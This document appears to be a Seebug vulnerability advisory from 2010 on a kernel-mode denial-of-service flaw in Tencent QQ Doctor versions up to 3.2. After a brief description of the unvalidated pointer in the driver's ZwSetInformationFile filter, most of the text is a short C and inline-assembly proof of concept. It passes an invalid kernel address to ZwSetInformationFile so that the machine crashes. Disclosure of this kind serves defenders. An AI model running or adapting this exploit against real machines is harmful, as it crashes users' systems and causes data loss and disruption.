Tencent QQ Doctor <= 3.2 ZwSetInformationFile Filter Kernel Mode D.O.S Vulnerability

2010-02-19T00:00:00
ID SSV:19129
Type seebug
Reporter Root
Modified 2010-02-19T00:00:00

Description

Tencent QQ Doctor Kernel Mode Driver direct using ZwSetInformationFile(FileDispostionInformation)->FileInformation without any memory validate .

1.0~3.2 unistall QQ Doctor

                                        
                                            
                                                	HMODULE hlib = GetModuleHandle("ntdll.dll");
	PVOID pZwSetInformationFile = GetProcAddress(hlib , "ZwSetInformationFile");


	__asm
	{
		push 0xd
		push 0
		push 0x80000000
		push 0
		push 0
		call pZwSetInformationFile
		

	}
	
	return 0;